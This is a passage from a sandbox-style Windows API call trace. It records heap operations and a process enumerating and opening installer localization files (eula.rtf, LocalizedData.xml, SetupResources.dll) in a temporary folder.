Size=0x20) returned 0x887c0 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0060.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.686] AreFileApisANSI () returned 1 [0060.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1035\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0060.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.687] AreFileApisANSI () returned 1 [0060.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0060.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 36 [0060.687] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.687] GetFileType (hFile=0x420) returned 0x1 [0060.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.687] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.687] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.687] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.687] CloseHandle (hObject=0x420) returned 1 [0060.688] AreFileApisANSI () returned 1 [0060.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0060.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 36 [0060.688] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.688] GetFileType (hFile=0x420) returned 0x1 [0060.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.688] CloseHandle (hObject=0x420) returned 1 [0060.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.689] AreFileApisANSI () returned 1 [0060.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0060.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 36 [0060.689] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76)) returned 1 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.689] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0060.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0060.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.690] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.690] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.690] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.690] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.690] AreFileApisANSI () returned 1 [0060.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.690] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.690] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0060.690] AreFileApisANSI () returned 1 [0060.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0060.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 45 [0060.691] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.691] GetFileType (hFile=0x420) returned 0x1 [0060.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.691] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.691] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.691] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.691] CloseHandle (hObject=0x420) returned 1 [0060.691] AreFileApisANSI () returned 1 [0060.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0060.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 45 [0060.692] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.692] GetFileType (hFile=0x420) returned 0x1 [0060.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.692] CloseHandle (hObject=0x420) returned 1 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.693] AreFileApisANSI () returned 1 [0060.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0060.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 45 [0060.693] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde)) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.693] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 